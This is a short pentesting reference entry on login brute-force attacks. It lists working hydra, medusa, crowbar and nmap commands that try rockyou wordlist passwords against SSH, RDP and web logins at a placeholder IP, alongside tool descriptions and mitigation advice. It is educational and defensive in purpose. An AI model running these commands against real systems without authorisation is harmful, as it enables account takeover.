Login Bruteforce

Overview

Login Brute-force attacks involve systematically attempting to authenticate against a service using many username/password combinations. These attacks target exposed login interfaces such as SSH, RDP, web forms, and VPN portals.

Online brute-force attacks require careful management of timing and concurrency to avoid lockout policies and detection.

Category: Brute Force & Cracking — Login brute-force, password cracking, and hashcat/john usage.

Key Commands & Payloads

The following commands and payloads are commonly used when testing for or exploiting Login Bruteforce:

hydra -l admin -P rockyou.txt ssh://10.10.10.10

hydra -L users.txt -P rockyou.txt rdp://10.10.10.10

hydra -l admin -P rockyou.txt -t 64 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

medusa -U users.txt -P rockyou.txt -h 10.10.10.10 -M ssh

crowbar -b rdp -s 10.10.10.10/32 -u admin -C rockyou.txt

nmap --script http-wordpress-brute -p 80 --script-args 'passwords=rockyou.txt,usernames=admin' 10.10.10.10

Tools & Techniques

Recommended tools for Login Bruteforce:

• Hydra: multi-protocol parallel login brute-forcer
• Medusa: modular parallel brute-force tool
• Crowbar: brute-force tool for RDP, SSH, VNC
• Nmap NSE scripts: protocol-specific brute-force
• Patator: flexible multi-protocol brute-forcer
• CeWL: custom wordlist generator from target website

Prevention & Mitigation

Security recommendations to prevent Login Bruteforce:

• Implement account lockout after 3-5 failed attempts
• Use rate limiting and CAPTCHA on login pages
• Require multi-factor authentication
• Use strong, unique passwords for all services
• Monitor and alert on multiple failed login attempts
• Implement IP-based blocking after threshold failures
• Use Web Application Firewall (WAF) to block brute-force traffic

References

Additional resources:

• https://github.com/vanhauser-thc/thc-hydra
• https://github.com/jmk-foofus/medusa
• https://github.com/galkan/crowbar
• https://github.com/lanjelot/patator